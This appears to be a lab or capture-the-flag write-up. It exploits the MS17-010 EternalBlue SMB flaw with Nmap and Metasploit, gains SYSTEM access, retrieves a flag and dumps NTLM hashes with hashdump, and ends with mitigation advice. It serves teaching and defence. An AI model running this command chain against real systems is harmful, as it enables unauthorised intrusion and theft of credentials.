Exploiting MS17-010 EternalBlue: SMB Flaw to SYSTEM Access
The exercise covered the full penetration testing workflow:
- Reconnaissance
- Vulnerability identification
- Exploitation
- Privilege verification
- Post-exploitation activities
Reconnaissance
The first step in any penetration test is understanding what is exposed. You cannot attack what you cannot see, and you should not attack blindly what you can.
I ran an Nmap version scan against the target:
nmap -sV <target-ip>
The scan revealed the following open ports and services:
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open tcpwrapped
49152/tcp open msrpc
49153/tcp open msrpc
49154/tcp open msrpc
49155/tcp open msrpc
The critical discovery was:
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds
Port 445 is the standard port for SMB, the Server Message Block protocol. SMB handles Windows file sharing, printer sharing, and remote service communication. It is a core Windows networking protocol, which also makes it a historically significant attack surface.
The presence of port 445 combined with a Windows 7 to Windows 10 version banner immediately made SMB the primary attack surface worth investigating. Older Windows SMB implementations have well-documented vulnerabilities, and the version range returned by the scan was enough to warrant deeper enumeration.
Vulnerability Identification
The target was running a Windows version known to be affected by a critical SMB vulnerability: MS17-010, widely known as EternalBlue.
MS17-010 is a vulnerability in the SMBv1 protocol implementation that allows unauthenticated remote code execution on affected Windows systems. It was discovered by the NSA, later leaked by the Shadow Brokers group, and subsequently used in the WannaCry and NotPetya ransomware attacks that caused billions of dollars in damage globally.
The vulnerability is tracked as:
CVE-2017-0144
Despite being patched in March 2017 via Microsoft Security Bulletin MS17-010, a significant number of systems remain unpatched years later. This makes it one of the most consistently exploitable vulnerabilities in penetration testing environments and real-world engagements.
The Metasploit module for this vulnerability is:
exploit/windows/smb/ms17_010_eternalblue
The module works by sending specially crafted SMB packets to trigger a buffer overflow in the Windows SMB server, which allows arbitrary code execution in the context of the SYSTEM account without requiring any credentials.
Exploitation
With the vulnerability identified and confirmed, I launched Metasploit:
msfconsole
I loaded the EternalBlue module:
use exploit/windows/smb/ms17_010_eternalblue
I configured the target host:
set RHOSTS <target-ip>
Before running the exploit, I verified that the target was actually vulnerable rather than assuming it based on the version banner alone:
check
The check confirmed the target was vulnerable to MS17-010. This step matters. Running exploits against systems that are not vulnerable wastes time and can cause unintended instability on production systems. Good practice is to verify before executing.
With confirmation, I executed the exploit:
run
The exploit succeeded. Metasploit returned a Meterpreter session on the target machine.
Obtaining Privileged Access
After receiving the Meterpreter shell, the first thing to verify is the current user context. Knowing where you are in the privilege hierarchy determines what you can do next.
getuid
The result:
Server username: NT AUTHORITY\SYSTEM
This confirmed that the session was already operating at the highest privilege level available on a Windows machine. SYSTEM is more privileged than a standard Administrator account. It has unrestricted access to the operating system, including protected files, registry keys, and system processes.
At this level, an attacker can:
- Read and modify any file on the system
- Access all user data across every account
- Dump credential hashes from memory and the SAM database
- Install or remove software and services
- Pivot to other systems on the network
- Disable security controls and logging
The fact that EternalBlue lands directly in a SYSTEM context without requiring any credential or privilege escalation step is what made it particularly dangerous in real-world attacks.
Finding the Flag
With SYSTEM privileges confirmed, I searched the filesystem for the flag file:
search -f flag.txt
The file was located at:
C:\Users\Jon\Documents\flag.txt
The file contents were retrieved directly through the Meterpreter session. No additional steps were needed because SYSTEM has unrestricted read access to every file on the machine, including files in other users' personal directories.
Extracting NTLM Hashes
The final objective was retrieving the NTLM hash of a user account named pirate.
NTLM hashes are the password representations Windows stores locally. They cannot be reversed directly into plaintext in most cases, but they can be cracked offline using tools like Hashcat or John the Ripper, or used directly in pass-the-hash attacks against other systems on the same network.
Because I had SYSTEM privileges, I used the Meterpreter hashdump command:
hashdump
This command reads from the Windows SAM database and extracts the local account hashes. The output contained the pirate account entry, and the NTLM hash value was extracted from the result.
This is one of the most common post-exploitation objectives in a real engagement. Once you have NTLM hashes, the attack surface expands significantly. Cracked credentials can be reused across other systems. Pass-the-hash techniques allow lateral movement without ever recovering the plaintext password.
The Full Attack Chain
Port Scanning
│
▼
SMB Discovery on Port 445
│
▼
MS17-010 Vulnerability Identified
│
▼
EternalBlue Exploitation
│
▼
Meterpreter Session Established
│
▼
NT AUTHORITY\SYSTEM Confirmed
│
▼
Flag Retrieved
│
▼
NTLM Hashes Dumped
The chain from initial port scan to credential extraction was entirely unauthenticated. No username. No password. No social engineering. Just an exposed port running a vulnerable protocol version.
Why This Still Matters in 2026
MS17-010 was patched in 2017. That is eight years ago. Yet it remains one of the most commonly encountered vulnerabilities in penetration testing engagements, particularly against internal networks, legacy systems, and environments with poor patch management discipline.
The reason is straightforward. Patching requires operational disruption. In environments where uptime is prioritized over security hygiene, patches get delayed indefinitely. Some systems run specialized software that vendors have not validated against newer OS versions, so organizations deliberately avoid patching to prevent compatibility issues. Others simply have no visibility into what is running on their network.
EternalBlue is not interesting because it is new. It is interesting because it demonstrates what happens when a critical vulnerability meets a predictable organizational failure: the assumption that because something has always worked, it is probably fine.
Mitigation
To prevent this type of attack:
- Apply security patches regularly, particularly critical severity patches for core protocol vulnerabilities
- Disable SMBv1 where it is not required, since SMBv2 and SMBv3 are not affected by MS17-010
- Avoid exposing SMB services directly to the internet or to untrusted network segments
- Use network segmentation to limit lateral movement even if a host is compromised
- Monitor for anomalous SMB traffic patterns, which can indicate scanning or exploitation attempts
- Perform regular vulnerability assessments to identify unpatched systems before attackers do
Conclusion
This exercise covered the complete penetration testing workflow from initial enumeration to privileged access and post-exploitation activity.
The important skill is not running the exploit. Metasploit automates that. The important skill is understanding why the target was vulnerable, recognizing the attack surface from the reconnaissance output, choosing the correct exploitation path, and documenting the process in a way that communicates both what happened and why it matters.
Tools like Nmap and Metasploit are effective because the people using them understand the systems they are targeting. The tool executes the technique. The tester understands the consequence.
Comments
Post a Comment